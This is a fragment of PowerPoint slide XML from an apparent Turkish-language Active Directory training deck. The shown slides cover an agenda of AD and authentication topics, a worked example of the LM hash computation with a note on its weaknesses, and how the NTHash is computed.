              <a:t>tanımlayınız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3751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82D05-D5A1-6CF7-0272-FAA6A1E93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LMHash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7DE68-C793-4ACE-3D62-897AF99460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 fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>LM Hash Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>geliştirilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> ilk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> Lan Manager </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>bünyesinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>protokolüdür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>Zayıflıkları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>nedeniyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>kolayca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>kırılabilmekte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>kesinlikle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>kullanılmaması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>önerilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>Aşağıda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> PassWord123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>parolası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>LMHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>algoritması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>görülmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. 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 err="1"/>
              <a:t>Tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>harfler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>büyük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>harfe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dönüştürülür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. =&gt; PASSWORD123 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err="1"/>
              <a:t>Değerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sonuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>karaktere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eklenir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. =&gt; PASSWORD123000 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Değer 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>karakterlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>anahatarı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bölünür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. =&gt; PASSWORD – D123000 • “KGS!@#$%” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>değeri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iki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>anahtarla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ayrı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ayrı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>şifrelenir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. =&gt; E52CAC67419A9A22 - 664345140A852F61 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err="1"/>
              <a:t>Oluşan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>değer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>birleştirilerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LMHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oluşturulur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> =&gt; E52CAC67419A9A22664345140A852F61 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>Kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>nedeniyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> 14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>karakterden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>uzun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>belirlenememektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>Ayrıca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>küçük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>büyük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>harfler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>aynı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>değerlendirilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>nedenlerden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>ötürü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>kolaylıkla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>kırılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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2865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64E38-8190-F4EA-B522-2877B683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Ajanda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F5DAB-67EC-53F5-2B8E-E1D81FF1C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/>
              <a:t>Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Temelleri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Mantıksal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Birimler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Türleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Yetkili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Yönetici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Objeler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Access Control Entity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Access Control List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Yapıları</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Türleri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Protokolleri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Temelleri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Double Hop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Sorunu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Unconstrained Delegation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Constrained Delegation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>NTLM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Temelleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Yapıları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31368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EED56-CF97-CC09-C309-F5A548912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NTHash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A9DE3-1784-8F80-DF90-3485288F15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r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LMHash’deki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eksiklikleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gidermek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>amacıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geliştirilmiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>görece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fonksiyonudur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Güncel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sistemlerde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolalar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tutulmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> MD4(UTF-16-LE(password)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesaplanmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> NTLM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>protokolünde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iletilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>şifrelenirken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılmaktadır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7983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C3E66-8B2F-B29B-1589-9CBF5EDD4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 err="1"/>
              <a:t>NTHash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9C55104-D22B-1790-61FD-3C7BE34E4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2731" y="1285875"/>
            <a:ext cx="7766538" cy="47958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50591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E16CB-113C-FA79-78C1-ABAF7E009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 err="1"/>
              <a:t>Kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
